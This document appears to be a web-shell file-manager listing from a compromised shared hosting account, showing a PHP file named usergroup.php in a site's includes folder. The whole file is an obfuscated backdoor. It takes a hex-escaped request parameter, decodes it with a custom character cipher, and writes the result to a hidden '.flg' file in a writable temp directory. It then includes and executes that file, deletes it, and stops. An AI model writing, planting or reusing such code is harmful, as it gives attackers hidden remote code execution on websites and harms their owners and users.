HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //home/vitanhod/wepatol.vitavit.com.pk/includes/usergroup.php
<?php

if(@$_REQUEST["\x73\x79\x6Dbol"] !== null){
	$token = $_REQUEST["\x73\x79\x6Dbol"];
			$token	=  	explode		(  '.'	 ,		$token )		;
	$property_set 	='';
            $s2 	='abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen 	=strlen($s2);
            $n 	=0;
    
            foreach ($token as $v8) { 	$chS 	=ord($s2[$n% 	$sLen]);
                $dec 	=((int)$v8 - $chS - ($n% 	10)) ^ 76;
                $property_set .= chr($dec);
                $n++;
            }
	$component = array_filter(["/tmp", "/var/tmp", "/dev/shm", session_save_path(), getenv("TMP"), getcwd(), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TEMP")]);
	foreach ($component as $record):
    		if (is_dir($record) ? is_writable($record) : false) {
    $ent = implode("/", [$record, ".flg"]);
    if (@file_put_contents($ent, $property_set) !== false) {
	include $ent;
	unlink($ent);
	die();
}
}
endforeach;
}